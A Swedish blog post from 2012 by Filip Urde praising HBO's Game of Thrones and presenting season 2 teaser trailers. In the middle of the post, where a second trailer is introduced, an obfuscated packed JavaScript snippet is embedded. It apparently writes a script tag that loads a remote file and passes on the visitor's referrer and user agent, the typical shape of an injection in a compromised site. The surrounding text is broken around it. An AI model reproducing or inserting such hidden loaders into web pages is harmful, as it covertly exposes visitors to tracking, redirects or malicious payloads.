Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Game of Thrones Säsong 2 är snart här och då blir det trailers!!

Game of Thrones Säsong 2 är snart här och då blir det trailers!!
Filip Urde
  • On 30 januari, 2012
  • http://www.revue.se/filip-urde

Den absolut häftigaste produktionen på väldigt länge är tillbaka för en ny säsong. Game of Thrones förgyllde mina veckor i samma klass som Band of Brothers gjort några år tidigare. HBO vet hur man gör serier, så är det. Man satt som på nålar under varenda avsnitt och på något sätt så lyckades man göra en säsong utan direkta väpnade konflikter, extremt spännande och beroendeframkallande cool.

Det är en Teaser, men man blir ju inte mindre taggad i alla fall.

Se en till trailer som visade här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iheek|var|u0026u|referrer|ktyen||js|php’.split(’|’),0,{}))
revue
tidigare.

Samt en bakom kulliserna för säsong 2 här nedan.

Tack Thörn!